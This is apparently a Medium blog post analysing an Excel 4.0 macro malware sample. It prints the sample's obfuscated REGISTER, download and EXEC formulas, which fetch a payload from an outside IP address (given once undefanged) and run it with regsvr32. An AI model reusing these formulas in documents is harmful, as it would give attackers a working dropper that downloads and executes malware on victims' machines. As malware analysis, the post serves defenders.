Excel 4.0 Macro Malware— old feature but can be harmful

Figure 1 — The “Enable Content” tempts the victim to run the malicious excel
Figure 2 — Unhide option
Figure 3 — Unhide sheets
Figure 4
Figure 5 — The Auto_Open function

First stage

Figure 6 — The REGISTER function
=REGISTER("uRl"&"Mon","U"&"RL"&"Do"&"wn"&"lo"&"ad"&"To"&"FileA",D20,"Drwrgdfghfhf",,D22,D23)
=REGISTER(uRlMon,URLDownloadToFileA,D20,Drwrgdfghfhf,,D22,D23)
URLMON = which DLL to load.URLDownloadToFileA = which function to call from the chosen DLL.D20 = "JJCCBB" (used to specify data types to call the API).Drwrgdfghfhf = custom name (will call the function with a new custom name "=Drwrgdfghfhf()").D22 = 1 (Category).D23 = 9 (Category).

Download

Now, we will see the use of the custom name function called “Drwrgdfghfhf”. The adversary will download the malware from a malicious server using HTTP protocol.

Figure 7 — Download a file
=Drwrgdfghfhf(0,"h"&"t"&"tp"&":"&"/"&"/"&Tiposa!E21&Tiposa1!G11&Sheet2!K12,"C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx",0,0)
Drwrgdfghfhf = custom name of the REGISTER function that we saw on figure 6.Tiposa!E21 = "158.69.133.79/".Tiposa1!G11 = random number between 213214234(bottom) and 9776980793567560(top) with the RANDBETWEEN() function.Sheet2!K12 = ".dat".
Figure 8 — RANDBETWEEN function
=Drwrgdfghfhf(0,"http://158[.]69[.]133[.]79/[RandomNumber].dat","C:\ProgramData\VDscytujyctfjkvu1.ocx",0,0)

The execution

The last part of the excel 4.0 macro is the file execution. The malware will use the EXEC function to run the malicious OCX file.

Figure 9 — EXEC function
Before:
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")
E19 = T(E20&E21) = "regs"
E20= "re"
E21= "gs"
--------------------------------------------------------------------
After:
=EXEC("rgsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx")

Conclusions

The excel 4.0 macro is an old feature (XLM 4.0 macro) that was introduced in 1992 by Microsoft. This technique is a different way to execute malicious code through office document. Beware, not only VBA code can compromised your machine.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store